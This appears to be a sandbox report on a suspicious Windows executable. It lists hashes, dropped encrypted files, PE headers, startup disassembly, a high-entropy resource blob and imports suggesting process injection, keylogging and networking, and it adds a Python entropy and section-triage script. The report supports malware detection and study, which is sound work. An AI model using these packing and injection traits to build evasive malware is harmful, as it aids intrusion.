                                                    Preview:y.u..03XL...Z..p.W3....[D...SHVFKL4W0WY03XLIM6SHVFKL4W0WY0.XLIC).FV.B...1...g0%:mF!'14*!.4Q97_Gx.,mD&&v/%lp.cw4_W=bD@<wHVFKL4WIVP..8+.pV4.k&,...cPT.V...o(1.Q..7>.a1/!pV4.VFKL4W0W.u3X.HL6..K.KL4W0WY0.XNHF7XHVPOL4W0WY03X.ZM6SXVFK|0W0W.03HLIM4SHPFKL4W0W_03XLIM6SxRFKN4W0WY01X..M6CHVVKL4W WY 3XLIM6CHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL.#U/-03X.]I6SXVFKZ0W0GY03XLIM6SHVFKL.W07Y03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLI
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):43554
                                                    Entropy (8bit):7.821532738392043
                                                    Encrypted:false
                                                    SSDEEP:768:Wf6Iuqd0f4ibxUJKNtFqya/QHtfwDTiP3qWimuAKNcsrWwyQcB:a6VqOf4ipNXVaYHJwHiPknNcMcB
                                                    MD5:D03333BB1A2FC1DFA578E0A1D89A0ECD
                                                    SHA1:1431DB53B5F90FCA1B45D11090C389516E879192
                                                    SHA-256:BDBAB462F22FC6403D62F7037D0E9D1C8FDE99074B29B26FC4CD2D32D8456A44
                                                    SHA-512:BDEAE11C6D2F090023C6997055B35569453DB2EBC6048BB6AD0DCF93F97F5056AD055023822B4F15A07BB602A855029D174F17CF9B54C3CF77CD6E8D7092857B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:EA06..P...).y.^g5.L.)..6.Qf.Z$.f....5P..6....:l.aF...9..g0.......3..fsj..kL...si.Ng8.L....3.Rfs.T.aY..*.9.X...S.sjD.....fsJ<.kG..)39.:m2...59..3.......E...S9....TP...."m4.L....$...Lh.9."g2..C..`..J.6..9...C..+S9.`....'.....EQ......0......>g0..QT...3.U&s...iT..i39.Vm1..QUI.......TP.....E*.9.X.b.L.5...6.T@...6.U.......qS... .5S..f...qO..@'.|.kE..(.i.....S&s:L.f..T..*0..X..@....3..sJL.j......."g9.L.`3...>.-+@(9.P&..e.g8.L. .%Rm4.-(s9. ...Lh.9..m5..Q@.p..P..Q...uS...`...6......biR...@.U..2..l@'..g9....9.8.v...c...mX.L...UP....).!...J...9..m4..U.....6..^.*.........Z..B..g9.L...d....fu....3.'(...8...L...3...!....<..)s`!......@.x...T...g9..).i.*g4.L.9..6.Uf....6.<...Bm1.L..!.@..@.......k <..aI.x.(...[6..&...6.Q&.DD..5...Y...W.@....Q.GP...\..).E..A8.....(.8..".j........:(..C.K.@......Q@L...6.U.sJ|.cE.?. .p..C..@.....E.L.`..@....lU..j.3.T.H.,....M.`..D....*..y....I..AD.....X.q.}@....j."..m@...Mh...X.*...@...........z..7T..2....4....6..I....ER.#...uRm2.M. .`.q
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):272384
                                                    Entropy (8bit):7.9934090783519185
                                                    Encrypted:true
                                                    SSDEEP:6144:GliSizvPXmMpg5ehcQvgP0FcKgF4m93rgD6AlyxfR60Ix1/:GllcnXmMRbgnWs3cMgx1/
                                                    MD5:A1FB5C2C967AA8558C7D23183F7AFD9C
                                                    SHA1:46A77E92EADE977BBF0EC71AFB2BC2A413E2AF3B
                                                    SHA-256:ACC62B73F9AFC1FFA76DFD1823BB3B6E2257EF8058CF8E7DAF733FD584ED9EF2
                                                    SHA-512:04E2A1888D8751774ECAF2D0A55BC92ACAC79E0212771355D8DA9C7D6644A72A574D1686CC065900D04C08EDC22B29560FCFAC7D2F9B5698544B65B3424B03EC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:y.u..03XL...Z..p.W3....[D...SHVFKL4W0WY03XLIM6SHVFKL4W0WY0.XLIC).FV.B...1...g0%:mF!'14*!.4Q97_Gx.,mD&&v/%lp.cw4_W=bD@<wHVFKL4WIVP..8+.pV4.k&,...cPT.V...o(1.Q..7>.a1/!pV4.VFKL4W0W.u3X.HL6..K.KL4W0WY0.XNHF7XHVPOL4W0WY03X.ZM6SXVFK|0W0W.03HLIM4SHPFKL4W0W_03XLIM6SxRFKN4W0WY01X..M6CHVVKL4W WY 3XLIM6CHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL.#U/-03X.]I6SXVFKZ0W0GY03XLIM6SHVFKL.W07Y03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLIM6SHVFKL4W0WY03XLI
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.182887764348203
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:0XLuA614VK.exe
                                                    File size:1'296'896 bytes
                                                    MD5:562cb5dcba0e691bf01ab2c020c0837e
                                                    SHA1:3ca5eb915edcce7da20a7b6046055cb11333647e
                                                    SHA256:4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52
                                                    SHA512:130e921e7bd869c6367a4fe664a5fe9df6432ff5ca3519d9fe4d378b52f4675b89ec9312a02ea8246868326d9c0c65703a45e289478afc7f26ce1ce6310077a9
                                                    SSDEEP:24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8awSX4F1d5Y/j20uMjwr4b:oTvC/MTQYxsWR7aw6yYpw4
                                                    TLSH:8055C0027391C062FFAB92334B5AF6115BBC79260123E61F13981DB9BE705B1563E7A3
                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                    Icon Hash:aaf3e3e3938382a0
                                                    Entrypoint:0x420577
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66C5182F [Tue Aug 20 22:26:55 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                    Instruction
                                                    call 00007F39A04CAFA3h
                                                    jmp 00007F39A04CA8AFh
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F39A04CAA8Dh
                                                    mov dword ptr [esi], 0049FDF0h
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                    mov dword ptr [ecx], 0049FDF0h
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F39A04CAA5Ah
                                                    mov dword ptr [esi], 0049FE0Ch
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                    mov dword ptr [ecx], 0049FE0Ch
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    and dword ptr [eax], 00000000h
                                                    and dword ptr [eax+04h], 00000000h
                                                    push eax
                                                    mov eax, dword ptr [ebp+08h]
                                                    add eax, 04h
                                                    push eax
                                                    call 00007F39A04CD64Dh
                                                    pop ecx
                                                    pop ecx
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    lea eax, dword ptr [ecx+04h]
                                                    mov dword ptr [ecx], 0049FDD0h
                                                    push eax
                                                    call 00007F39A04CD698h
                                                    pop ecx
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    push eax
                                                    call 00007F39A04CD681h
                                                    test byte ptr [ebp+08h], 00000001h
                                                    pop ecx
                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x65f70 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x13a000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x65f70 | 0x66000 | d2b8fe8c365b219de1d9575c1cee3331 | False | 0.9358652152267157 | data | 7.910809203499628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x13a000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
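As an added example (not part of the Joe Sandbox report and not the sandbox's own code), the Python below reproduces the kinds of numbers shown in the dropped-file entries and in the section table above: the 8-bit Shannon entropy behind the "Entropy (8bit)" field, an "Encrypted" verdict based on a threshold, the decoding of the PE "Time Stamp" field, and a triage pass over the section table transcribed from this report. The 7.99 "encrypted" threshold and the 7.0 section cut-off are assumptions chosen to agree with the values on this page; Joe Sandbox's real cut-offs are not stated here.

```python
"""Static-triage helpers mirroring the entropy, timestamp and section fields
in a sandbox report. Added example, not Joe Sandbox code; thresholds are assumed."""
import math
from collections import Counter
from datetime import datetime, timezone


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the quantity the
    report's 'Entropy (8bit)' field shows."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Assumed threshold (the page does not state Joe Sandbox's cut-off). 7.99
# reproduces the verdicts above: 7.993 -> Encrypted:true, 7.82 -> Encrypted:false.
ENCRYPTED_THRESHOLD = 7.99


def looks_encrypted(entropy: float) -> bool:
    """Mimic the report's 'Encrypted' flag from an entropy value."""
    return entropy >= ENCRYPTED_THRESHOLD


def pe_timestamp(raw: int) -> str:
    """Decode IMAGE_FILE_HEADER.TimeDateStamp (seconds since the Unix epoch, UTC)."""
    return datetime.fromtimestamp(raw, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def triage_sections(sections):
    """Flag sections a packer or dropper typically leaves behind.
    Each entry is (name, virtual_size, raw_size, entropy, characteristics).
    Heuristics (assumed cut-offs):
      * entropy >= 7.0 in a non-code section: compressed or encrypted payload
      * writable and executable: self-modifying / unpacking stub
      * virtual size more than twice the raw size: room reserved for unpacked code
    """
    findings = []
    for name, vsize, rsize, ent, chars in sections:
        if ent >= 7.0 and "IMAGE_SCN_CNT_CODE" not in chars:
            findings.append((name, "high-entropy data section (%.2f)" % ent))
        if "IMAGE_SCN_MEM_WRITE" in chars and "IMAGE_SCN_MEM_EXECUTE" in chars:
            findings.append((name, "writable and executable"))
        if rsize and vsize > 2 * rsize:
            findings.append((name, "virtual size %#x far exceeds raw size %#x" % (vsize, rsize)))
    return findings


# Section table of 0XLuA614VK.exe, transcribed from the report above.
SECTIONS = [
    (".text",  0x9ab1d, 0x9ac00, 6.668273581389308,
     "IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ"),
    (".rdata", 0x2fb82, 0x2fc00, 5.691811547483722,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".data",  0x706c,  0x4800,  0.5846666986982398,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    (".rsrc",  0x65f70, 0x66000, 7.910809203499628,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".reloc", 0x7594,  0x7600,  6.7972128181359786,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ"),
]

if __name__ == "__main__":
    # Constructed inputs: a run of zero bytes (0 bits/byte) and a uniform
    # 0..255 cycle (8 bits/byte) bracket the range of the report's values.
    print("zeros   :", round(shannon_entropy(b"\x00" * 4096), 3))
    print("uniform :", round(shannon_entropy(bytes(range(256)) * 16), 3))
    print("timestamp:", pe_timestamp(0x66C5182F))
    for name, why in triage_sections(SECTIONS):
        print(name, "-", why)
```

Run stand-alone it flags only .rsrc: at 7.91 bits/byte it is the one non-code section that looks packed, and the RT_RCDATA resource (0x5d236 of the 0x66000 raw bytes, ZLIB complexity about 1.0, i.e. already incompressible) accounts for nearly all of it, so that blob is the first thing to carve out and inspect.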
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x5d236 | data | | | 1.0003302804238074
RT_GROUP_ICON | 0x1399f0 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x139a68 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x139a7c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x139a90 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x139aa4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x139b80 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
